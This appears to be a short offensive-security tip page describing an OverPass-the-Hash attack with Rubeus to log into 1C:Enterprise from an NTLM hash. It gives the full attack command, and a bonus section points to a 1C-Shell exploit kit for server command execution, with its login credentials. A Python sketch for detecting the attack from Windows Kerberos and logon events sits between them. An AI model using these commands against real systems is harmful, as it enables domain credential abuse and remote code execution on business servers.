To gain access to 1C Enterprise, you need a username and password. If 1C is configured for LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C with an OverPass-the-Hash attack. This gives you access to 1C Enterprise without knowing the plaintext password.
Invoke-Rubeus -Command "asktgt /user:i.ivanov /domain:APTNOTES.LOCAL /rc4:A87F3A337D73085C45F9416BE5787D86 /createnetonly:C:\\1cestart.exe /show"
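For defenders, the command above leaves two well-known traces: a TGT request using RC4-HMAC (event 4768, ticket encryption type 0x17) on the domain controller, and a NewCredentials logon (event 4624, logon type 9, logon process seclogo) on the workstation where the process was created. The following detection sketch is an added example, not part of the original page; the event dictionaries are constructed, and the normalised "host" field and the five-minute window are assumptions.

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17                 # Kerberos etype of a TGT requested with an NT hash
WINDOW = timedelta(minutes=5)   # assumed correlation window

# Constructed events. "host" is an assumed normalised field: the workstation for
# 4624, and the client address from 4768 resolved to a hostname by the pipeline.
EVENTS = [
    {"time": "2024-01-10T09:00:00", "id": 4768, "host": "WS01",
     "user": "a.petrov", "etype": "0x12"},
    {"time": "2024-01-10T09:14:02", "id": 4624, "host": "WS07",
     "user": "helpdesk", "logon_type": 9, "logon_process": "seclogo"},
    {"time": "2024-01-10T09:14:03", "id": 4768, "host": "WS07",
     "user": "i.ivanov", "etype": "0x17"},
    {"time": "2024-01-10T11:30:00", "id": 4624, "host": "WS03",
     "user": "admin", "logon_type": 9, "logon_process": "seclogo"},
]

def ts(ev):
    return datetime.fromisoformat(ev["time"])

def is_rc4_tgt(ev):
    """4768 on the DC: TGT issued with RC4-HMAC instead of AES."""
    return ev["id"] == 4768 and int(ev["etype"], 16) == RC4_HMAC

def is_netonly_logon(ev):
    """4624 on the workstation: NewCredentials logon (type 9) via seclogo."""
    return (ev["id"] == 4624 and ev.get("logon_type") == 9
            and ev.get("logon_process", "").strip().lower() == "seclogo")

def find_overpass_the_hash(events, window=WINDOW):
    """Pair each RC4 TGT request with a netonly logon on the same host."""
    logons = [e for e in events if is_netonly_logon(e)]
    alerts = []
    for tgt in filter(is_rc4_tgt, events):
        for logon in logons:
            if logon["host"] == tgt["host"] and abs(ts(tgt) - ts(logon)) <= window:
                alerts.append({"host": tgt["host"], "tgt_user": tgt["user"],
                               "local_user": logon["user"], "time": tgt["time"]})
    return alerts

if __name__ == "__main__":
    for alert in find_overpass_the_hash(EVENTS):
        print(alert)
```

Either signal alone is noisy (legacy RC4 clients, legitimate runas /netonly); requiring both on the same host within the window is what narrows it down.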
Bonus:
If the compromised user has permission to run "External data processors", you can get a reverse shell on the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell
1C-Shell is a configuration for the 1C:Enterprise 8 platform that allows commands to be executed on the 1C server in the context of the USR1CV8 user, the account under which the 1C server runs.
Login: Kraud
Password: MArS6M